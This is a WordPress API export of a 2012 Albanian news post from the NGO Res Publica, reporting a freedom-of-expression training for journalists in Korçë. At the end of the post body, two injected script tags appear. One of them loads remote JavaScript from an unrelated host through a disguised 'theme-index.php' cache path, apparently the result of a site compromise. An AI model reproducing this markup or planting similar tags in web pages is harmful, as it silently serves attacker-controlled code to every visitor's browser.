{"id":448,"date":"2012-11-17T09:25:36","date_gmt":"2012-11-17T07:25:36","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=448"},"modified":"2013-09-30T09:27:33","modified_gmt":"2013-09-30T07:27:33","slug":"korce-2012-gazetaret-jane-te-lajmeruar","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=448","title":{"rendered":"Kor\u00e7\u00eb 2012, gazetar\u00ebt jan\u00eb t\u00eb lajm\u00ebruar"},"content":{"rendered":"<p>N\u00eb dat\u00eb 17 n\u00ebntor 2012 n\u00eb ambientet e bibliotek\u00ebs s\u00eb Bashkis\u00eb \u00a0Kor\u00e7\u00eb, u organizua nj\u00eb tjet\u00ebr trajnim p\u00ebr gazetar\u00ebt dhe profesionist\u00ebt e medias, me tem\u00eb: \u201cLiria e shprehjes, nga teoria n\u00eb praktik\u00eb\u201d.<\/p>\n<p>N\u00eb organizim mor\u00ebn pjes\u00eb 16 prej emrave m\u00eb t\u00eb njohur t\u00eb gazetaris\u00eb, aktivist\u00ebve t\u00eb prefektur\u00ebs s\u00eb Kor\u00e7\u00ebs, Dekani i Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs z Altin Shegani, zv Dekani i Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs z Besnik \u00c7erekja, si dhe ekspert\u00eb t\u00eb fush\u00ebs, vendas dhe t\u00eb huaj, q\u00eb prezantuan konceptet q\u00eb duhen t\u00eb ken\u00eb parasysh gazetar\u00ebt dhe profesionist\u00ebt e medias n\u00eb raport me lirin\u00eb e shprehjes.<\/p>\n<p>Organizuar nga Res Publica dhe mb\u00ebshtetur nga National Endo\u00ebment for Democracy, trajnimi ofroi n\u00eb nj\u00eb model t\u00eb thjeshtuar, koncepte t\u00eb s\u00eb drejt\u00ebs q\u00eb hasen n\u00eb pun\u00ebn e p\u00ebrditshme nga gazetar\u00ebt dhe profesionist\u00ebt e medias.<\/p>\n<p>Trajnimi u cel me nj\u00eb prezantim t\u00eb Dekanit t\u00eb Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs, Dr. Altin Shegani, i cili b\u00ebri nj\u00eb hyrje n\u00eb konceptet baz\u00eb t\u00eb liris\u00eb s\u00eb shprehjes dhe r\u00ebnd\u00ebsis\u00eb q\u00eb ajo ka n\u00eb nj\u00eb shoq\u00ebri demokratike. Materiali q\u00eb pasoi ishte i p\u00ebrgatitur nga Yllka Lam\u00e7e (Kandidate p\u00ebr doktoratur\u00eb), dhe hodhi drit\u00eb mbi konceptet e liris\u00eb s\u00eb shprehjes si\u00e7 p\u00ebrcaktohen n\u00eb Kushtetut\u00eb dhe n\u00eb Konvent\u00ebn Evropiane p\u00ebr t\u00eb Drejtat e Njeriut. Punimi u prezantua nga Av. Andi Kananaj. Eksperti i jurisprudenc\u00ebs s\u00eb Gjykat\u00ebs Evropiane p\u00ebr t\u00eb Drejtat e Njeriut, Av. Theodoros Alexandridis, shpjegoi n\u00eb m\u00ebnyr\u00eb t\u00eb detajuar aspekte t\u00eb Nenit 10 t\u00eb KEDNJ, i cili mbron lirin\u00eb e shprehjes.<\/p>\n<p>Av. Alexandridis prezantoi gjithashtu nj\u00eb material praktik, nj\u00eb udh\u00ebzues p\u00ebr \u00e7far\u00eb i lejohet nj\u00eb gazetari dhe \u00e7far\u00eb nuk i lejohet t\u00eb kryej\u00eb. \u00c7do udh\u00ebzues u shoq\u00ebrua me raste konkrete nga jurisprudenca e Gjykat\u00ebs s\u00eb Strasburgut. Av. Dorian Matlija dhe Av. Edvin Kukunja, me asistenc\u00ebn edhe t\u00eb studentes praktikante Arbesa Kurti,\u00a0 njoh\u00ebn gazetar\u00ebt me nj\u00eb nr \u00e7\u00ebshtjevesh konkrete q\u00eb ka ndjekur Res Publica n\u00eb mbrojtje t\u00eb interesave t\u00eb gazetar\u00ebve n\u00eb gjykatat shqiptare. Rastet u shoq\u00ebruan edhe me disa konkluzione t\u00eb cilat iu shtruan debatit mes pjes\u00ebmarr\u00ebsve p\u00ebr t\u00eb kuptuar nivelin e p\u00ebrfitimit t\u00eb koncepteve t\u00eb trajtuara n\u00eb k\u00ebt\u00eb trajnim.<\/p>\n<p>Pjes\u00ebmarr\u00ebsve, si dhe n\u00eb takimin e par\u00eb iu shp\u00ebrnda edhe nj\u00eb certifikat\u00eb p\u00ebr pjes\u00ebmarrjen n\u00eb trajnim, t\u00eb n\u00ebnshkruar nga titullar\u00ebt akademik\u00eb t\u00eb pranish\u00ebm. R\u00ebnd\u00ebsi t\u00eb madhe pati debati i ndezur, i cili doli p\u00ebrtej parashikimeve t\u00eb organizator\u00ebve, duke qen\u00eb nj\u00eb indikator i vlefsh\u00ebm p\u00ebr interesin e gazetar\u00ebve rreth koncepteve t\u00eb trajtuara dhe p\u00ebr p\u00ebrthithjen e suksesshme t\u00eb tyre.<\/p>\n<p>Duke falenderuar pjes\u00ebmarr\u00ebsit dhe ekspert\u00ebt, Res Publica krijoi besimin se aktivitetet q\u00eb japin informacion me karakter praktik do t\u00eb jen\u00eb t\u00eb mir\u00ebpritura dhe n\u00eb t\u00eb ardhmen nga gazetar\u00ebt, profesionist\u00ebt e medias dhe p\u00ebrfaq\u00ebsuesit e organizatave t\u00eb gazetar\u00ebve.<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00eb dat\u00eb 17 n\u00ebntor 2012 n\u00eb ambientet e bibliotek\u00ebs s\u00eb Bashkis\u00eb \u00a0Kor\u00e7\u00eb, u organizua nj\u00eb tjet\u00ebr trajnim p\u00ebr gazetar\u00ebt dhe [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":450,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/448"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=448"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/448\/revisions"}],"predecessor-version":[{"id":449,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/448\/revisions\/449"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/450"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=448"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=448"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}